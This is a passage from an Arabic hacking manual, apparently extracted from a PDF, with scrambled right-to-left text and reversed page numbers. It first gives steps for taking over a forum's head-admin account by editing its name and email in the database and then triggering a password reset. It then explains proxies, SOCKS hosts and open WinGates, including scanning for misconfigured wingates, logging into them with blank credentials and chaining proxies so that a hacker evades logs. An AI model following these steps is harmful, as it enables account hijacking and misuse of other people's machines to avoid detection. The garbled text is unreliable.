بمعرفة المشرف العام مھما تغیر السم‪                     ‬‬ ‫‪6‬باسورد المشرف العام مشفر‪                                          ‬‬‫‪7‬بريد المشرف العام‪                                                  ‬‬‫ـــــــــــــ‪                                                              ‬‬ ‫انت اذا لقیت اسم المشرف العام سواء عن طريق الرقم ‪ 6‬او انت تريد تعدل‪  ‬‬ ‫علیه اضغط على رقم ‪ 1‬اي تحرير السم ثم بتفتح لك صفحه واتبع الموجود في‬ ‫الصوره تحت‪                                                           ‬‬ ‫بعد ما تحفظ التعديلت اذھب الى المنتدى وادخل اسم المشرف العام اللي‪  ‬‬ ‫اخترته واكتب اي باسورد طبعا يبي يقول لك خطاء اطلب استعادة كلمة المرور‬ ‫ثم اكتب بريدك وانتظر الرساله ثم ادخل وشف شغلك‪                       ‬‬ ‫ــــــــــ‪                                                                 ‬‬ ‫‪                                  432‬‬


‫تحت‪            ‬‬ ‫اما في حالة كان اسم المشرف العام محذوف اتبع الصوره ت‬ ‫ذي‪                                         ‬‬ ‫ثم تبي تفتح لك الصفحه ھ ي‬ ‫المرور‪           ‬‬ ‫ر‬ ‫طبعا نفس الطريقه بعد ما تحفظ التعديلت استرجع كلمة‬ ‫ــــــــــــــــــــــــــــــــــــــــ‪                                            ‬‬ ‫ـ‬ ‫الشرح اللي فوق ھ ذا للمواقع العاديه فیه شرح في السفل لطريقة الدخول‬ ‫ل‬ ‫لیوكس‪                                      ‬‬ ‫س‬ ‫الى قاعدة البیانات بموقع‬ ‫السفل‪                      ‬‬ ‫ل‬ ‫بعد تسجیل الدخول للموقع اتبع الصوره في‬ ‫‪                               532‬‬ ‫بعدھ ا بتفتح لك صفحه ثانیه وايضا اختر من القائمه الموجود في الصوره‬ ‫ه‬ ‫الصوره‪                          ‬‬ ‫ه‬ ‫بعدھ ا بتفتح صفحه ثانیه وايضا اتبع‬ ‫تحت‪                       ‬‬ ‫بیفتح لك مربع اختر نفس اللي بالصوره ت‬ ‫‪                           632‬‬ ‫تبي‪   ‬‬ ‫بعدھ ا بأعلى المربع موجود الخیارات اللي في الصوره تحت اختر اللي ي‬ ‫وطبق نفس الشرح الموجود فوق في تعديل اسم المشرف العام او اضافة اسم‬ ‫م‬ ‫جديد‪                                                                 ‬‬ ‫د‬ ‫‪                                732‬‬ ‫؟!!‪                       ‬‬ ‫كیف تبقى مجهول الهویة !‬ ‫الــ<>ــد<>ــر‪                                                   ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫الول‪                                                               ‬‬ ‫ل‬ ‫الجزء‬ ‫بتعلیمكم‪                                     ‬‬ ‫م‬ ‫في ھذا الموضوع سوف أقوم‬ ‫و؟‪                                                                    ‬‬ ‫ماھ ؟‬ ‫‪                                            Proxy ­ Sock Host ­ Wingate‬‬ ‫النت‪      (-‬‬ ‫(‬ ‫)‪-‬وكیفیة استخدامھم للزيادة من صعوبة الكشف عن ھويتك في‬ ‫التخفي‪                                ‬‬ ‫ي‬ ‫مع أدوات بسیطة أيضا تساعدك في‬ ‫‪               ++++++++++++++++++++++++++++++++++‬‬ ‫‪                                            Introduction to Proxy Server‬‬ ‫)=الدخول إلى ‪ proxy server‬أي‪:‬خادم الوكیل=((‪                            ‬‬ ‫ى‪     ‬‬ ‫) ‪proxy server‬خادم الوكیل) ھو خادم ‪ server‬لیقوم أحدا ما بتنزيله على‬ ‫التصال‪  ‬‬ ‫ل‬ ‫نظامه للتصال مع المواقع أو أي جھاز على النترنت مايفعله أول ھو‬ ‫‪                                                proxy server‬‬ ‫‪p‬‬ ‫بخادم الوكیل‬ ‫الشبكات‪                         ‬‬ ‫ت‬ ‫لكنه غیر إجباري لكن غالبا مايستخدم في‬ ‫‪                                                                 :LAN‬‬ ‫‪:‬‬ ‫ل‬ ‫مثل‬ ‫‪                                                     Local Area Network‬‬ ‫ك‪ ‬‬ ‫شبكة إنترنت محلیة عند اتصالك بالنترنت خلل ‪ proxy server‬جمیع اتصالتك‬ ‫تتوزع‪   ‬‬ ‫ع‬ ‫سوف تذھب إلى ھ ذا البروكسي المستخدم أول وقبل كل شيء ثم‬ ‫كمثال‪                           ‬‬ ‫ل‬ ‫على الجھ زة التي تريد أن تعمل إتصال بھا‬ ‫ح‪ ‬‬ ‫إذا أردت أن تتصل بالنترنت من خلل استخدام ‪ proxy server‬وتريد أن تتصفح‬ ‫ذا‪                                                         ‬‬ ‫وتفتح موقعا كھ ا‬ ‫‪                                                  /http://hackergurus.tk‬‬ ‫علیك أول بالطلب من ھذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬ ‫ة‬ ‫‪                                                  /http://hackergurus.tk‬‬ ‫ك‪    ‬‬ ‫إلى الخادم ‪ server‬الموقع ومن ثم تحمیلھا وتخزينھا في حسابھا بعد ذلك‬ ‫ا‪                              ...‬‬ ‫سوف تمدك وتعطیك الصفحة أي‪:‬تستعرضھ ‪.‬‬ ‫‪                                   832‬‬ ‫ر‪  ‬‬ ‫ألیست ھذه العملیة تأخذ ‪ bit‬بسیط في وقت أطول مقارنة بالتصال المباشر‬ ‫جاري‪      ‬‬ ‫ي‬ ‫(العادي) الذي يكلفك فقط بطلب الصفحة من خادم الموقع ومن ثم‬ ‫تحمیلھا بسھولة واستعراضھاا‪                                               ‬‬ ‫بطيء‪     ‬‬ ‫ء‬ ‫لكن مع استعمالك للبروكسي سیرفر سوف يصبح اتصالك بالنترنت‬ ‫مقارنة مع التصال المباشر وذلك لن كل صفحة تقوم بتحمیلھا أي تستعرضھاا‪ ‬‬ ‫ح‪     ‬‬ ‫تذھب إلى خادم البروكسي أي ‪ proxey server‬وھذا يثقل عملیة التصفح‬


‫ف‪                     ‬‬ ‫وھناك حالة وحدة وقد تصبح ‪ lucky‬بعض الحیان قل كیف‬ ‫وانت‪  ‬‬ ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات ت‬ ‫الي‪  ‬‬ ‫استخدمت البروكسي الي استخدمه ھذا الشخص واستعرضت الصفحة ي‬ ‫لیه؟!‪                                ‬‬ ‫!‬ ‫استعرضھ ا راح يصبح البروكسي سريع‬ ‫الصفحة‪    ‬‬ ‫ة‬ ‫لن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات‬ ‫ت‪      ‬‬ ‫حملت إلى ‪ proxy server‬فما بالك إذا كان لديك نفس البروكسي وحبیت‬ ‫ة‪      ‬‬ ‫تسعرض نفس الصفحة سوف يكون سريع لن الصفحة ‪ download‬جاھزة‬ ‫مت‪                                                                 ..#‬‬ ‫‪.‬‬ ‫فھ‬ ‫قبل‪ ‬‬ ‫وأيضا ياأخواني الوقت مھ م مثل اذا الواحد استعرض صفحة ببروكسي من ل‬ ‫‪01‬أيام وانت استخدمت نفس البروكسي واسعرضت نفس الصفحة غیر اذاا‪   ‬‬ ‫ة‪       ‬‬ ‫عرضھا في يومین لن ‪ proxy server‬يقدم المواقع الحديثة على القديمة‬ ‫أو‪   ‬‬ ‫علشان كذا أحیانا تلحظ تأخر في البروكسیات كل ماعلیك عمل ‪ Refresh‬و‬ ‫‪                                                                   Reload‬‬ ‫‪                                                  Why use a Proxy Server‬‬ ‫سیرفر؟=(‪                                     ‬‬ ‫(‬ ‫)=لماذا نستمعل البروكسي‬ ‫وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملیة‬ ‫ة‬ ‫؟!!!‪               ‬‬ ‫!‬ ‫إبطاء التحمیل والتقلیل من السرعة إذا مالدافع لستخدامه‬ ‫النترنت‪                                        ‬‬ ‫ت‬ ‫الجواب‪:‬ھ و أن مزودين خدمة‬ ‫‪                                                                       ISP‬‬ ‫‪                                                 Internet Service Provider‬‬ ‫وتحمیل‪     ‬‬ ‫ل‬ ‫يقومون بالتحديد وبوضعك في قفص وھ و عدم السماح لستعراض‬ ‫بتقلیل‪     ‬‬ ‫ل‬ ‫الصفحات إل التي تم الموافقة علیھ ا من قبل مزود الخدمة ويقومون‬ ‫م‪         ‬‬ ‫المواقع للحفاظ على ‪ Traffic‬الخاص بھ م لتوفیر السرعة في استخدام‬ ‫م‪                                                    ‬‬ ‫البروكسي لمشتركینھم‬ ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مھماا‬ ‫كان وسبب آخر للبروكسي وھو للحفاظ أو للزيادة من بقائك مجھول أثناء قیامك‬ ‫ك‬ ‫على‪ ‬‬ ‫بأي عملیة من عملیات التصال يعني لو استخدمت بروكسي راح يصعب ى‬ ‫‪                                    932‬‬ ‫‪  ip‬‬ ‫خادم الموقع اصطیادك وذلك لنه يأخذ ‪ ip‬الذي اتصل الموقع من خلله وھو ‪i‬‬ ‫الموقع‪                                      ‬‬ ‫ع‬ ‫البروكسي وھو الذي يتصل مع خادم‬ ‫عدة‪     ‬‬ ‫وأيضا تستطیع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام ة‬ ‫سرعة‪ ‬‬ ‫ة‬ ‫بروكسیات ذات منافذ مختلفة لكن أعلم أن ھذا سوف يقوم بتقلیل من‬ ‫تستخدم‪                                                    ‬‬ ‫م‬ ‫التصال لذلك حاول ان‬ ‫‪  proxy server‬‬ ‫‪p‬‬ ‫‪proxy‬و ‪ port‬قريبین إلى منطقتك التي تعیش فیھا حتى يكون‬ ‫سرعة‪        ‬‬ ‫ة‬ ‫قريب وبذلك سوف تزداد السرعة وأحیانا تفوق سرعة البروكسي‬ ‫!!‪                                       ‬‬ ‫بروكسي الخاص بمزود الخدمة مارأيك(‪! ..‬‬ ‫وضع‪   ‬‬ ‫ع‬ ‫تحذير للجمیع إياكم ياأخوان أن تنخدعوا ببروكسیات مايكروسوفت مھما‬ ‫استخدم‪                                                   ‬‬ ‫م‬ ‫لھا من إعلن كأن يقول‬ ‫‪                                                    08‬‬ ‫‪cach.microsoft.com‬بمنفذ ‪0‬‬ ‫الممیزات‪                             ‬‬ ‫ت‬ ‫وطبعا انت ماتصدق تلقي بروكسي بھذي‬ ‫ح‪                                                                    ‬‬ ‫‪1‬سريع التصفح‬‫ع‪                                                              ‬‬ ‫‪2‬يفتح جمیع المواقع‬‫ي‪                                                       ‬‬ ‫‪3‬التحمیل عالي جدا وقوي‬‫؟‪                                                                    ‬‬ ‫ھل تعرف لماذا ؟‬ ‫جدا‪      ‬‬ ‫لن أكثر المستخدمین حول العالم ھذا البروكسي سیرفر وھذا خطیر ا‬ ‫في‪     ‬‬ ‫لن ھ ذا البروكسي سیرفر سوف يقوم بمعرفة جمیع تحركاتك وحفظھا ي‬ ‫‪                                                                          Logs‬‬ ‫ملفات ‪L‬‬ ‫ت‬ ‫‪                                                         Introduction to Wingate‬‬ ‫‪                                              Wingate‬‬ ‫‪W‬‬ ‫)=الدخول أو الدخال إلى=(‬ ‫؟‪                              ‬‬ ‫كثیرا مانسمع عنه لكن ھل نعرف معناه الحقیقي ؟‬


‫ماھو ‪ WinGate‬؟‪                                                                    ‬‬ ‫ز‪  ‬‬ ‫ھو ‪ proxy server firewall‬أي يفوق البروكسي وھو خادم بروكسي ذو حاجز‬ ‫والتي‪    ‬‬ ‫ي‬ ‫ناري يحتوي على حزمة كبیرة وضخمة من البرامج المختصة بالحماية‬ ‫تبقیك) ‪ Anonymously‬مجھول الھوية((‪                                             ‬‬ ‫بشركة‪ ‬‬ ‫ة‬ ‫التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت‬ ‫بالكامل‪                                                                     ‬‬ ‫ل‬ ‫كمبیوتر‬ ‫اتصال النترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل‪       ::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪     dial up modem, ISDN, xDSL, cable modem, satellite connection, or‬‬ ‫‪                                                      even dedicated T1 circuits‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪                                         042‬‬ ‫‪                                                                 wingate‬‬ ‫آخر‪    ‬‬ ‫متشابه مع البروكسي سیرفر حیث يعمل اتصالت مع كومبیوتر لسیرفر ر‬ ‫‪                             Telnet‬‬ ‫‪T‬‬ ‫خلل المنفذ ‪ 32 ,‬في الحقیقة ھو اتصال‪.‬‬ ‫ل‪  ‬‬ ‫‪ the wingate‬سوف يجعل أي شخص على الشبكة دخول النترنت أو التصال‬ ‫‪    Aminstrator‬‬ ‫‪A‬‬ ‫به لمواقع أخرى ‪ .‬بصورة سیئة وفق بین ‪ wingate‬وعدم كفاءة‬ ‫ت‪      ‬‬ ‫)المدير)وھنالك العديد من ‪ wingate‬والذي تجعل الشخاص على النترنت‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫للتصال ببعضھ م ‪ ,‬بدل من تحديد المدخل للناس من) ‪ Local Network‬‬ ‫المحلیة(‪                                                                  ‬‬ ‫(‬ ‫ل‪       ‬‬ ‫وفتح الطريق لي شیئ من ‪ ipspoof‬في ‪ ICQ ­ Mirc‬إلى سوء استغلل‬ ‫الحجم‪                                                                    .‬‬ ‫‪.‬‬ ‫ة‪   ‬‬ ‫مثل ‪ wingate‬قد يطلق علیه ‪ open wingates‬وعادة تنتھي مدتھا في بضعة‬ ‫‪   DIScover‬‬ ‫‪D‬‬ ‫أيام أو شھور حتى يقوم باكتشافه) ‪ Admin‬المدير) وھذا راح يكون‬ ‫أعضاء‪         ‬‬ ‫ء‬ ‫ياأخواني يعني مكشوف أو يتلقى شكاوي من سوء استخدام أو‬ ‫غامضین!!!‪                                                                ‬‬ ‫!‬ ‫في‪     ‬‬ ‫الفائدة الوحیدة للمديرين ھي القدرة على وضع مستخدمین متعددين ي‬ ‫الفوائد‪                             ‬‬ ‫د‬ ‫نفس التصال لكن ياأخوان المشاكل تفوق‬ ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به علیه الحذر بشدة ومعرفة ماھو‪   ‬‬ ‫‪     WinGate‬‬ ‫‪W‬‬ ‫يفعل ويتأكد من أنه موفق بشكل آمن وھنالك أخرى متعددة أكثر‬ ‫‪                                                    SyGate‬‬ ‫‪S‬‬ ‫أمانا مثل برامج‬ ‫تحذف‪ ‬‬ ‫في معظم الحالت ملفات) ‪ Logs‬سجلت) الخاصة بالـ ‪ WinGate Server‬ف‬ ‫عادة بعد ‪ 84‬ساعة للعمال وأيضا للـ ‪ISP's‬خاصة بالكبارأي ليوجد حاجة أوو‪     ‬‬ ‫‪                                wingate‬‬ ‫‪w‬‬ ‫موارد لتدوين كل شيء يصادف خادم‬ ‫‪                                                  How do I find Wingates‬‬ ‫؟=(‪                                  ‬‬ ‫(‬ ‫)=كیف يمكنني الحصول على‪WinGate‬‬ ‫عنوان‪  ‬‬ ‫ن‬ ‫أفضل طريقة للحصول على ھذا الشيء ھو كلمة بالفم ‪ .‬بإمكانك تاخذ‬ ‫م‪ ‬‬ ‫‪ wingate‬من أصدقائك إذا كان أحد عنده ‪ .‬الشيء الثاني أقترح علیك تستخدم‬ ‫برامج‪                                                                      ‬‬ ‫ج‬ ‫‪                                                         WinGate Scanner‬‬ ‫‪                              google‬‬ ‫‪g‬‬ ‫ھنالك العديد منھا بالنت ابحث فقط في‬ ‫‪                                                 /http://www.google.com‬‬ ‫ث‪          ‬‬ ‫كل ماعلیك فعله ھو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬ ‫مثل اقترح علیك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقیا وأخیراا‬ ‫شبكة (@)‪ home‬كلھم يتشابھون ولديھم صفات شائعة وھي‪                 ::‬‬ ‫‪                                     142‬‬ ‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة ھناك ‪ wingate‬مفتوح قلیل على‬ ‫ى‬ ‫‪NetWork‬حقھم‪                                                       ....‬‬ ‫خلل ‪ Unix‬أفضل طريقة ھي‪ :‬المحاولة والخطأأ‪                             ‬‬ ‫‪                                                          Trial and Error‬‬


‫‪                                  32‬‬ ‫اتصل بالتلنت في ‪ wingate‬من المنفذ ‪3‬‬ ‫واذا لقیت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك‬ ‫ك‬ ‫‪ Anonymously‬‬ ‫‪A‬‬ ‫تجربة اسمك وكلمة سرك او تستخدم میزة) ‪ Guest‬الضیف) أوو‬ ‫‪                                             Introduction to Socks Host‬‬ ‫‪                                    Socks Host‬‬ ‫‪S‬‬ ‫)=الدخول أو الدخال إلى=(‬ ‫ن‪  ‬‬ ‫‪Socks Host‬تقريبا مثل ‪ WinGate‬لكن الختلف وھو ان السوكس يتصل من‬ ‫ح‪   ‬‬ ‫خلل المنفذ ‪ 0801‬وبإمكانك عمل العدادات علیھا وھي تتوفر في المتصفح‬ ‫‪                                                  explorer and netscape‬‬ ‫‪                                              Socks Host‬‬ ‫‪S‬‬ ‫وبإمكانك إضافة‬ ‫ك‪  ‬‬ ‫وھ ذه الطريقة تستخدم كثیرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك‬ ‫‪                                                       FireWall‬‬ ‫‪F‬‬ ‫وتعمل كـ‬ ‫**********************‪                                            ‬‬ ‫وية‪                            ‬‬ ‫وھذه برامج مساعدة على بقائك مجھول الھ ة‬ ‫**********************‪                                            ‬‬ ‫برنامج ‪ GhostSurf‬الذي يجعلك تتصفح متخفیا (مجھول الھوية (‪              ‬‬ ‫‪                                                         =[]=][Stealther‬‬ ‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجھول ‪             %001‬‬ ‫‪                                   242‬‬ ‫؟!!‪                      ‬‬ ‫كیف تبقى مجهول الهویة !‬ ‫الــ<>ــد<>ــر‪                                                       ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫الثاني‪                                                                   ‬‬ ‫ي‬ ‫الجزء‬ ‫كالسابق‪        ...‬‬ ‫‪.‬‬ ‫ألحین الموضوع ھ ذا سوف يكون فیه تطبیق عملي ولیس‬ ‫ت‪ ‬‬ ‫ھذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على النترنت وقت‬ ‫ذا‪     ‬‬ ‫أطول أثناء اتصالك لكن لتظن ان ھذا الموضوع كافي فكلما قرأت عن ھ ا‬ ‫ول‪                                      ‬‬ ‫الجانب سوف تصبح الشخص المجھ ل‬ ‫‪      Telnet‬‬ ‫‪T‬‬ ‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجھول على‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                    ( ‬‬ ‫من المعروف أن أغلبكم يستخدم ‪ proxy‬لخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد‬ ‫د‬ ‫ويته‪         .‬‬ ‫‪.‬‬ ‫يستخدم البروكسي لكي يجتاز المواقع المغلقة وأيضا لحماية ھ‬ ‫‪   Ip‬‬ ‫لكن علیك ان تتعلم كیف تستخدم ‪ Proxy‬ومن الفضل ان تعرف ماذا ھو ‪I‬‬ ‫أول‪                                                    ,,,‬‬ ‫‪,‬‬ ‫‪Address‬و ‪Domain‬‬ ‫‪ Proxy‬‬ ‫‪P‬‬ ‫قبل أن تقرأ ھ ذا الموضوع علي اول ان اقوم بإرشادك كیف تحصل على‬ ‫المواقع‪                                                 :‬‬ ‫‪:‬‬ ‫مع تحديثھا من ھذه‬ ‫‪                              http://www.multiproxy.org/anon_list.htm‬‬ ‫‪                                 /http://tools.rosinstrument.com/proxy‬‬ ‫أو ھ نالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪Group‬وھو يقوم بإرسال‬ ‫ل‬ ‫مختلفة‪                                      ‬‬ ‫ة‬ ‫بروكسیات جديدة جدا وبمنافذ‬ ‫‪                               :P_R_O_X_Y(@)yahoogroups.com‬‬ ‫‪:‬‬ ‫ب‬ ‫الجروب‬ ‫التسجیل‪                                                              ‬‬ ‫ل‬ ‫طريقة‬ ‫الطريقة‪                      ‬‬ ‫ة‬ ‫قم بالدخول إلى حسابك وأرسل للجروب بھذه‬ ‫اكتب‪                                                  ‬‬ ‫في خانة الرسال إلى ب‬ ‫‪                           P_R_O_X_Y­subscriber(@)yahoogroups.com‬‬ ‫‪R‬‬ ‫‪Replay‬‬ ‫وأرسل رسالة فارغة إلیھ م بعد ذلك سوف تتلقى رد مباشرة قم بعمل‬ ‫بالجروب‪                                             ‬‬ ‫ب‬ ‫الن مبروك لقد سجلت‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                     ‬‬ ‫‪                                  342‬‬ ‫=========================‪                                  ‬‬ ‫أن‪           ‬‬ ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطیع التأكد من ن‬ ‫إلى‪                                               :‬‬ ‫‪:‬‬ ‫البروكسي يعمل بالذھاب‬ ‫‪                                                  /http://www.privacy.net‬‬


‫أو‪                                                                            ‬‬ ‫‪                                            /http://www.proxytester.com‬‬ ‫وقد تعرف ھل عنوان ‪ Ip‬تغیر أم ل !!! ھذا بالنسبة للموقع الول أما الموقع‪     ‬‬ ‫الثاني فھو خاص لكشف البروكسیات واعطائك مستوياتھا‪                    ..‬‬ ‫=========================‪                                  ‬‬ ‫*************************************‪                             ‬‬ ‫&&&&&&&&&&&&&&‪                                                      ‬‬ ‫‪                                                               proxy server‬‬ ‫&&&&&&&&&&&&&&‪                                                      ‬‬ ‫ھو خادم ‪ Proxy‬يقوم بالتصال بین( ‪                 : (WebSite,IRC Chat,etc‬‬ ‫ھذه البروكسیات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم‪   ‬‬ ‫موقعا على النترنت البروكسي يرسل طلبك على النترنت لكي يطلب ھذا‪   ‬‬ ‫الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وھذا سوف يخزن في ‪  Proxy‬‬ ‫‪                                                                     Server‬‬ ‫كما قلنا في الموضوع السابق‪                                             ...‬‬ ‫ھذي توضح كیف تتصل عن طريق البروكسي بالموقع‪                           ‬‬ ‫‪                               ][User]>>>>>[Proxy]>>>>>[Web Pages‬‬ ‫­­­­­­­­­­­­­­­­‪                                                              ‬‬ ‫‪                                                            Proxy Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪                                                              ‬‬ ‫معناھا عدة بروكسیات وھذي طريقة فعالة جدا لكي تصبح مجھول الھوية حیث‬ ‫يمكنك ان تتصل بأكثر من بروكسي لكي تعرض موقع واحد‪                     ‬‬ ‫مثال‪                                                                        /‬‬ ‫‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Desti‬‬ ‫‪                                     442‬‬ ‫‪                                                                      ]nation‬‬ ‫يوضح ھ ذا المثال ان المستخدم اول علیه التصال بالبروكسي الول فالثاني‪    ‬‬ ‫فالثالث والرابع وأخیرا الھ دف مما يسبب بطأ في التصال‪                        ‬‬ ‫‪                      Destination = web page, Unix server, ftp server, etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي ھكر لیحفظ سريته اثناء‬ ‫الدخول إلى أي ‪ server‬مثل ‪                               telnet, ftp, or http‬‬ ‫‪Chaining‬ھي مھمة كما أقول لن تصبح مجھول ‪ %001‬لكن حاول بقدر‪         ‬‬ ‫المستطاع على ان ل تمسك ويطادونك مثل السمكة لكن البروكسیات‪         ‬‬ ‫المتعددة صعب ان يكشفھا احدا لكن مثل حاولت تدخل على موقع بالـ ‪ftp‬راح‪ ‬‬ ‫يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‪                    ‬‬ ‫‪Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا راح يكون ‪  proxy‬‬ ‫ھھھھھھھھه يعني على ھ ذا المنوال إلى ان يصل الى المستخدم لذلك عملیة‬ ‫‪Chaining Proxy‬عملیة مفیدة جدا ويصعب احدھم المساك بك‪               ‬‬ ‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى‬ ‫الحد المسموح به من تحمیل الملفات على البروكسي الخادم الي يحتوي‪     ‬‬ ‫على البروكسیات لذلك سوف تصبح ملفات ‪ Logs‬متجددة‪                    ...‬‬ ‫­­­­­­­­­­­­­­­­‪                                                               ‬‬ ‫‪                                                             HTTP Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪                                                               ‬‬ ‫‪HTTP chaining‬ھي نفس طريقة ‪ Proxy‬ويمكنك عملھا من مستعرضك وفي‪ ‬‬ ‫خانة ‪                                                                Address‬‬ ‫مثال‪                                                                         :‬‬ ‫‪                  http://proxy.magusnet.com/­_­http://www.google.com‬‬ ‫حركة جمیلة وجديدة (‪ )-_-‬لم ترونھا مسبقا صحیح!!!‪                          ‬‬ ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل‪                                          :‬‬


‫‪               ­_­/http://proxy.server1.com/­_­http://proxy.server2.com‬‬ ‫‪                                                http://www.destination.com‬‬ ‫او يمكننا وضع عناوين بروكسیات بمنافذھا‪                                     ‬‬ ‫‪               http://anon.free.anonymizer.com/http://www.google.com‬‬ ‫‪                                      542‬‬ ‫مثال آخر‪                                                                ‬‬ ‫كإضافة علمة (‪ )/‬بین المواقع‪                                          ‬‬ ‫‪  http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com‬‬ ‫= ‪proxy‬استبدله ببروكسي رقمي يكون أفضل لك‪                   .....‬‬ ‫­­­­­­­­­­­­­­­­‪                                                         ‬‬ ‫‪                                                   Browser Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪                                                         ‬‬ ‫وھ و استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن‪   ‬‬ ‫‪ Internet Explorer‬لنه الكثر استخداما‪                             ----‬‬ ‫ألحین مثل عندنا بروكسي‪                                             ‬‬ ‫‪                                                  08:32.421.432.312‬‬ ‫العنوان‪                                              32.421.432.312:‬‬ ‫المنفذ‪                                                              08:‬‬ ‫ألحین كیف نحطھا بدال البروكسي الخاص بالـ ‪ISP‬أي مزد خدمة النترنت‪   ‬‬ ‫نروح عند‪                                                               ‬‬ ‫أدوات‪                                                             Tools‬‬ ‫خیارات إنترنت ‪                                       Internet Options‬‬ ‫بعدين اتصالت ‪                                           Connections‬‬ ‫تختار التصال الي تدخل في النترنت بعدين‪                             ‬‬ ‫إعدادات ‪                                                      Settings‬‬ ‫راح تجد‪                                                                 ‬‬ ‫) ‪Address‬العنوان(‪                                                     ‬‬ ‫) ‪Port‬المنفذ(‪                                                          ‬‬ ‫ونضعه بداله‪                                                            ‬‬ ‫العنوان‪ 32.421.432.312:‬المنفذ‪ 08:‬وبعد كذا اضغط موافق و‪              ‬‬ ‫والحین نبغى نستخدم الستعراض المتعدد ‪            Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا‪       /‬‬ ‫‪:Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port‬‬ ‫‪                                                                     08‬‬ ‫‪                                642‬‬ ‫‪          $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫&&&&&&&&&&&&&&‪                                                      ‬‬ ‫‪                                                                      Wingates‬‬ ‫&&&&&&&&&&&&&&‪                                                      ‬‬ ‫‪Wingate‬ھو ‪ proxy server‬الذي ينزل في جھازه او جھازھا لیسمح بالفرد او‪  ‬‬ ‫بعدة أفراد لیأخذون مقاعدھم بالمنفذ خلل ‪(( 32‬منفذ ‪ Telnet‬العادي((‪        ‬‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل ‪ online‬لكي يتصلون به مباشرة‪ ‬‬ ‫او في وقت قصیر لتتعدى اليام لكن اعلم ان ھذا لیس من القانون وھنالك‪     ‬‬ ‫خصائص للـ ‪Admin‬تمنع من استخدام ‪ wingate‬على جھازه ھذا على حسب‪ ‬‬ ‫المدير ھل يفھم في ھذا المجال أم ل!!!!‪                                    ‬‬ ‫وھي عبارة عن ‪ ip‬أجھزة أو اسماء أجھزة تتصل من خللھا على المنفذ ‪    32‬‬ ‫بأداة ‪ Telnet‬أو يمكنك من عمل بحث ببرامج‪                                  ‬‬ ‫‪                                                                       WinScan‬‬ ‫‪                                                                      Wingate‬‬ ‫‪                                                                     Download‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                 ‬‬ ‫‪                                         Chaining Wingates Using Telnet‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                 ‬‬ ‫ألحین راح نستخدم عدة ‪ Wingate‬كالسابق والدوات التي نحتاجھا‪             ‬‬ ‫ھي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الجھزة سوف تخلو من أھم ھذين‪       ‬‬ ‫الداتین إل نادرا‪                                                           .....‬‬ ‫جمیع ‪ wingate‬تتصل عن طريق المنفذ ‪ 32‬لكن المنفذ لیس مھما لكني سوف‬ ‫أضیفھ ا لكم لكي تتعلموا فقط كیف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‪  ‬‬ ‫وھذا عنوان جھاز امكننا إحضاره‪                                              ‬‬ ‫ھو ‪ 031.911.331.16‬ومنفذه ‪                                             32‬‬ ‫‪                                    742‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪                              :‬‬ ‫‪                       32 031.911.331.16 C:\WINDOWS>telnet‬‬ ‫لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‪      ‬‬ ‫بعد كذا سوف تتصل بالوين جیت مثل ھذا‪                           ‬‬ ‫‪                                  32 661.371.702.302 